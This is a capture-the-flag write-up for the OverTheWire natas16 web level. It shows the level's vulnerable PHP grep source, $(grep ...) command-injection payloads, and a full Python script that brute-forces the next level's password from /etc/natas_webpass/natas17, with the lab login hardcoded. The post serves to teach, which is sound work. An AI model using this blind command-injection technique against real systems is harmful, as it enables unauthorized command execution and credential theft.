Challange:
For security reasons, we now filter even more on certain characters.

Where we see the input field again to search for words containing:

Solving it:
So lets have a look at the source code

<html>
<body>
<h1>natas16</h1>
<div id="content">

For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

As we can see the keys ; | & ` \ ' " are being filtered. I googled to check what the \ character does in the part \"key\". If I’m correct this escapes the “. So this would make it "key" in the command, but I’m not sure. Documentation about the escape character states: \X escapes the character X. This has the effect of “quoting” X, equivalent to ‘X’. The \ may be used to quote ” and ‘, so they are expressed literally.

We can not break out of these qoutes by using qoutes ourself. I looked some stuff up and you are able to execute another command inside a command by using "($date)" for example. The only problem is that we don’t really get any response back from the command. So we can’t just simply cat the output like this $(cat /etc/natas_webpass/natas17)test however, I found out that if you enter an invalid file name it actually searches for the word after the brackets. So we have a validation if the command is executed or not, however we don’t see the output of the command.

Knowing this we can probably use the script from the previous exercise to get the password by bruteforcing it character by character with grep. Lets try to modify the python file and run some tests. But wait, lets try to grep on the file in /etc first and see if we can get any regex to work. If we do the following $(grep -i b /etc/natas_webpass/natas17)test and grep for a or b we get no output. If we grep for something that for sure doesn’t exist like aaaaaaa. It executes the search for test. So this works, OKAAY lets edit the python script. I came up with the following:
ps, for the sake of using something that returns less output to look for I used the word “abstractest”. Which will only return back 1 string. Just to make sure the script doesn’t fail. If it works Ill test it with “test”. The script is as follows:

import string
import requests

characters = string.ascii_letters + string.digits
url = "http://natas16.natas.labs.overthewire.org/"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
password = ""
passlength = 32
exists_str = "abstractest"

# go through the loop till password is 32 characters long and then go into the loop passing all characters
while len(password) != 32:
    for char in characters:
        uri = ''.join([url+'?needle=$(grep ^'+password+char+' /etc/natas_webpass/natas17)abstractest&submit=Search'])
        r = requests.get(uri, auth=(auth_username, auth_password))
        if exists_str not in r.text:
            password += char
            print("Password: {0}".format(password))

So we changed the url and ofcourse the credentials to authenticate. We also had to edit the uri because we are attacking it in a different way and not using a SQL injection. As last we had to edit the if statement because we only want to know the character if it DID NOT show the word “abstractest”. After running this script we received the passwords:

There where some hiccups since I didn’t received the correct password at first. This was because there was probably more info in there then the password. So we had to grep with a ^ to match a new line instead of using normal grep or grep -i.

Leave a Reply

Your email address will not be published. Required fields are marked *